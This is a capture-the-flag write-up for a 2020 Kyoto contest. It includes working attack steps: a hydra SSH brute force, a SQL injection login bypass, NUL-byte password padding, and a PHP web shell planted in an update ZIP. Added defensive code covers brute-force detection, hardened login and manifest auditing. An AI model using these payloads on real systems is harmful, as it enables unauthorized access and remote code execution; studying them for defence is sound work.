Hacking Contest in Kyoto Smart City Expo 2020: Write-up
- 0 decode(Very Easy)
- 1-1 FTP(Very Easy)
- 1-2 SSH avoidance(Very Easy)
- 2-1 basic authentication(Easy)
- 6-1 exploration(Very Easy)
- 7-1 hidden flag(Very Easy)
- 6-2 authentication avoidance(Easy)
- 4-1 breakthrough(Easy)
- 6-3 clairvoyance(Medium)
- 5-1 Discovery key(Easy)
0 decode(Very Easy)
$ echo -n 'RkxBR19reW90b3NtYXJ0Y2l0eWV4cG8=' | base64 -d
FLAG_kyotosmartcityexpo
1-1 FTP(Very Easy)
1-2 SSH avoidance(Very Easy)
$ hydra -L user.txt -P password.txt 54.150.39.201 -s 52222 ssh
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-12-11 21:14:51
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 10000 login tries (l:100/p:100), ~625 tries per task
[DATA] attacking ssh://54.150.39.201:52222/
[52222][ssh] host: 54.150.39.201   login: admin   password: password
$ ssh admin@54.150.39.201 -p 52222
The authenticity of host '[54.150.39.201]:52222 ([54.150.39.201]:52222)' can't be established.
ECDSA key fingerprint is SHA256:K7NbGooE0P1B3L7BaC/or41slf4l+P8sfJSR71TtqIc.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[54.150.39.201]:52222' (ECDSA) to the list of known hosts.
admin@54.150.39.201's password:
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 5.4.0-1030-aws x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

This system has been minimized by removing packages and content that are
not required on a system that users do not log into.

To restore this content, you can run the 'unminimize' command.

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

Last login: Sat Dec 12 02:09:52 2020 from 115.124.149.87
admin@58d2aec14ceb:~$ ls
flag.txt  q6
admin@58d2aec14ceb:~$ cat flag.txt
FLAG_jbSSTdXTLCc4a
admin@58d2aec14ceb:~$
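The hydra run above is what a password-guessing burst looks like from the attacker's terminal; on the server it shows up as a run of "Failed password" lines from one source followed by an "Accepted password". The following detector is an added example, not part of the write-up or the contest infrastructure: it parses sshd lines in the classic syslog format, flags a source IP that exceeds a threshold of failures inside a sliding window, and records whether that source later logged in successfully. The log lines are constructed for the example (203.0.113.0/24 and 198.51.100.0/24 are documentation ranges).

```python
"""Detect SSH password-guessing bursts in sshd auth logs (added example)."""
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample lines in the syslog format sshd uses on Ubuntu.
SAMPLE_LOG = """\
Dec 11 21:14:52 host sshd[1201]: Failed password for invalid user root from 203.0.113.5 port 51234 ssh2
Dec 11 21:14:52 host sshd[1202]: Failed password for admin from 203.0.113.5 port 51235 ssh2
Dec 11 21:14:53 host sshd[1203]: Failed password for admin from 203.0.113.5 port 51236 ssh2
Dec 11 21:14:53 host sshd[1204]: Failed password for invalid user test from 203.0.113.5 port 51237 ssh2
Dec 11 21:14:54 host sshd[1205]: Failed password for admin from 203.0.113.5 port 51238 ssh2
Dec 11 21:14:55 host sshd[1206]: Accepted password for admin from 203.0.113.5 port 51239 ssh2
Dec 11 21:20:00 host sshd[1300]: Accepted publickey for deploy from 198.51.100.7 port 40000 ssh2
Dec 11 21:25:00 host sshd[1301]: Failed password for deploy from 198.51.100.7 port 40001 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>password|publickey) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)

def parse_line(line):
    """Return (timestamp, result, user, ip) or None for lines we do not care about."""
    m = LINE_RE.match(line)
    if not m:
        return None
    # syslog lines carry no year; strptime defaults to 1900, which is fine for deltas
    ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S")
    return ts, m["result"], m["user"], m["ip"]

def analyze(log_text, threshold=5, window_seconds=60):
    """Map each flagged source IP to a summary of the burst.

    A source is flagged once it produces `threshold` failures within
    `window_seconds`; an accepted login from that source afterwards is the
    event worth paging on, so it is recorded separately."""
    failures = defaultdict(list)   # ip -> timestamps of failed logins
    users = defaultdict(set)       # ip -> usernames tried
    findings = {}                  # ip -> summary, once the threshold is crossed
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, result, user, ip = parsed
        if result == "Failed":
            failures[ip].append(ts)
            users[ip].add(user)
            recent = [t for t in failures[ip] if (ts - t).total_seconds() <= window_seconds]
            if len(recent) >= threshold:
                entry = findings.setdefault(ip, {"success_after_burst": None})
                entry["failures"] = len(failures[ip])
                entry["usernames"] = sorted(users[ip])
        elif ip in findings and findings[ip]["success_after_burst"] is None:
            findings[ip]["success_after_burst"] = user
    return findings

if __name__ == "__main__":
    for ip, summary in analyze(SAMPLE_LOG).items():
        print(ip, summary)
```

The single failure from 198.51.100.7 stays below the threshold and is ignored; 203.0.113.5 crosses it on the fifth failure and is then seen logging in as admin, which is exactly the sequence the hydra output above produces.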
2-1 basic authentication(Easy)
6-1 exploration(Very Easy)
$ strings q6_backend_1.1
authUT
dmVyc2lvbjoxLjEsbmFtZTphZG1pbixwYXNzd29yZDpGTEFHX2UwclBGR0dlNkhha3Y=
contents.phpUT
"ip4h
{Y`SL
6yAx
Cj>Ks6
wIvS
t#Yt
authUT
contents.phpUT
$ echo -n 'dmVyc2lvbjoxLjEsbmFtZTphZG1pbixwYXNzd29yZDpGTEFHX2UwclBGR0dlNkhha3Y=' | base64 -d
version:1.1,name:admin,password:FLAG_e0rPFGGe6Hakv
7-1 hidden flag(Very Easy)
flag: FLAG_iZAPDhs3T2iYS
6-2 authentication avoidance(Easy)
username='+OR+1=1--&password=
flag: FLAG_RqWGsVKFAQMUn
4-1 breakthrough(Easy)
There is a login screen that demands a password of at least 6 characters. Looking at the source code, the password is 1234, so padding the missing characters with %00 lets you log in.
username=user1&password=1234%00%00
flag: FLAG_ajiofeijljkjsdklajie
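The two login bypasses above (the tautology in 6-2 and the NUL-padded password in 4-1) come from the same class of mistake: the server checks one thing and compares another. The block below is an added example, not the challenge code; it models each vulnerable handler against an in-memory sqlite3 database and puts a hardened handler beside them. The accounts are constructed, and the 4-1 model assumes the backend compared only the bytes before the first NUL, which is the behaviour that makes "1234" plus two %00 satisfy a 6-character minimum.

```python
"""Login handlers modelling the 6-2 (SQL injection) and 4-1 (NUL-byte padding)
bypasses, beside one hardened handler.  Added example; not the challenge's own code."""
import hashlib
import hmac
import os
import sqlite3

PBKDF2_ROUNDS = 100_000
MIN_PASSWORD_LEN = 6

def hash_password(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)

def make_db() -> sqlite3.Connection:
    """Constructed accounts.  The plaintext column exists only to drive the two
    vulnerable handlers; the hardened handler uses salt + pw_hash."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, salt BLOB, pw_hash BLOB)")
    for user, pw in (("admin", "s3cretpass"), ("user1", "1234")):
        salt = os.urandom(16)
        conn.execute("INSERT INTO users VALUES (?, ?, ?, ?)",
                     (user, pw, salt, hash_password(pw, salt)))
    conn.commit()
    return conn

def login_sqli(conn, username: str, password: str):
    """6-2 style: the query is assembled by concatenation, so a username of
    ' OR 1=1-- turns the WHERE clause into a tautology and comments out the
    password check."""
    sql = ("SELECT username FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None

def login_nul_truncation(conn, username: str, password: str):
    """4-1 style: the length rule is checked on the raw submission, but the
    comparison sees only the bytes before the first NUL (assumed backend behaviour)."""
    if len(password) < MIN_PASSWORD_LEN:
        return None
    effective = password.split("\x00", 1)[0]
    row = conn.execute("SELECT username FROM users WHERE username = ? AND password = ?",
                       (username, effective)).fetchone()
    return row[0] if row else None

def login_hardened(conn, username: str, password: str):
    """Parameterised query, control characters rejected up front, length rule
    applied to the exact bytes that are compared, constant-time hash compare."""
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in username + password):
        return None
    if len(password) < MIN_PASSWORD_LEN:
        return None
    row = conn.execute("SELECT username, salt, pw_hash FROM users WHERE username = ?",
                       (username,)).fetchone()
    if row is None:
        hash_password(password, b"\x00" * 16)   # keep timing similar for unknown users
        return None
    name, salt, stored = row
    return name if hmac.compare_digest(hash_password(password, salt), stored) else None

if __name__ == "__main__":
    db = make_db()
    print("sqli     :", login_sqli(db, "' OR 1=1--", ""))
    print("nul pad  :", login_nul_truncation(db, "user1", "1234\x00\x00"))
    print("hardened :", login_hardened(db, "' OR 1=1--", ""),
          login_hardened(db, "user1", "1234\x00\x00"),
          login_hardened(db, "admin", "s3cretpass"))
```

Note that in the hardened handler user1 can never log in at all: a 4-character password fails the same minimum that the comparison enforces, which is the point of applying the rule to the bytes that are actually compared.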
6-3 clairvoyance(Medium)
It looks like arbitrary code execution is possible if an update file is uploaded the right way. Uploading an arbitrary file gets you told off with "The ZIP format or the password is wrong", so I build an exploitable file using the existing version 1.1 update file as a reference. Add <?php echo shell_exec($_GET['p']);?> to the contents.php inside 1.1.zip, compress it, and upload it.
$ zip -rm 1.2.zip auth contents.php
  adding: auth (stored 0%)
  adding: contents.php (deflated 43%)
I tried to read the flag.php file with
http://18.177.208.49/tmp/72386217aab504b7e38ee7c28415f2e1a9717101982109dec8.php?p=cat%20flag.php
For a moment I panicked, thinking I would have to take root, but when I looked at the source code the FLAG was there.
flag: FLAG_ZaKKC00Wn9nis
5-1 Discovery key(Easy)
I am not familiar with apk files, so I decoded it roughly with apktool, and the FLAG was in AndroidManifest.xml.
<?xml version="1.0" encoding="utf-8" standalone="no"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android" android:compileSdkVersion="30" android:compileSdkVersionCodename="11" package="com.example.getcoupon" platformBuildVersionCode="30" platformBuildVersionName="11">
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
    <application android:allowBackup="true" android:appComponentFactory="androidx.core.app.CoreComponentFactory" android:debuggable="true" android:icon="@mipmap/ic_launcher" android:label="@string/app_name" android:roundIcon="@mipmap/ic_launcher_round" android:supportsRtl="true" android:theme="@style/Theme.GetCoupon" android:usesCleartextTraffic="true">
        <meta-data android:name="com.google.android.maps.v2.API_KEY" android:value="FLAG_2NHxcrKRph73j"/>
        <activity android:name="com.example.getcoupon.GetCouponActivity"/>
        <activity android:name="com.example.getcoupon.MainActivity">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
        </activity>
    </application>
</manifest>
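Besides the key in the meta-data element, this manifest ships with debuggable="true", usesCleartextTraffic="true" and allowBackup="true", and its launcher activity has an intent-filter without an explicit android:exported. The audit script below is an added example, not part of the write-up or of apktool: it parses the decoded manifest with the standard library and reports each of those findings. The sample manifest is the one decoded above, with the XML declaration omitted; the name hints used to spot hard-coded secrets are my own heuristic.

```python
"""Audit a decoded AndroidManifest.xml for settings a reviewer should not ship (added example)."""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
SECRET_NAME_HINTS = ("KEY", "SECRET", "TOKEN", "PASSWORD")   # heuristic, assumed
COMPONENT_TAGS = ("activity", "service", "receiver", "provider")

def attr(name: str) -> str:
    """Fully qualified name of an attribute in the android: namespace."""
    return f"{{{ANDROID_NS}}}{name}"

# The manifest decoded in the write-up above (XML declaration omitted).
SAMPLE_MANIFEST = """\
<manifest xmlns:android="http://schemas.android.com/apk/res/android" android:compileSdkVersion="30" android:compileSdkVersionCodename="11" package="com.example.getcoupon" platformBuildVersionCode="30" platformBuildVersionName="11">
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
    <application android:allowBackup="true" android:appComponentFactory="androidx.core.app.CoreComponentFactory" android:debuggable="true" android:icon="@mipmap/ic_launcher" android:label="@string/app_name" android:roundIcon="@mipmap/ic_launcher_round" android:supportsRtl="true" android:theme="@style/Theme.GetCoupon" android:usesCleartextTraffic="true">
        <meta-data android:name="com.google.android.maps.v2.API_KEY" android:value="FLAG_2NHxcrKRph73j"/>
        <activity android:name="com.example.getcoupon.GetCouponActivity"/>
        <activity android:name="com.example.getcoupon.MainActivity">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
        </activity>
    </application>
</manifest>
"""

def audit_manifest(xml_text: str) -> list:
    """Return (kind, detail) tuples for each risky setting found."""
    root = ET.fromstring(xml_text)
    findings = []
    app = root.find("application")
    if app is None:
        return findings

    # Boolean application flags that should be false on a release build.
    flag_checks = (
        ("debuggable", "debuggable", "debugger and run-as access on a release build"),
        ("usesCleartextTraffic", "cleartext-traffic", "plain HTTP allowed; traffic readable on the path"),
        ("allowBackup", "allow-backup", "app data extractable via adb backup on older Android releases"),
    )
    for attribute, kind, why in flag_checks:
        if app.get(attr(attribute)) == "true":
            findings.append((kind, why))

    # Literal (non-resource) meta-data values whose name suggests a credential.
    for md in app.iter("meta-data"):
        name = md.get(attr("name"), "")
        value = md.get(attr("value"), "")
        if value and not value.startswith("@") and any(h in name.upper() for h in SECRET_NAME_HINTS):
            findings.append(("hardcoded-secret", f"{name} = {value}"))

    # Components with an intent-filter are exported by default; make that explicit.
    for tag in COMPONENT_TAGS:
        for comp in app.iter(tag):
            if comp.find("intent-filter") is not None and comp.get(attr("exported")) is None:
                findings.append(("implicit-export", comp.get(attr("name"), "?")))
    return findings

if __name__ == "__main__":
    for kind, detail in audit_manifest(SAMPLE_MANIFEST):
        print(f"{kind:18s} {detail}")
```

Running it over the decoded manifest yields five findings: the three application flags, the literal API_KEY value, and the implicitly exported MainActivity. GetCouponActivity has no intent-filter and is therefore not exported by default, so it is not reported.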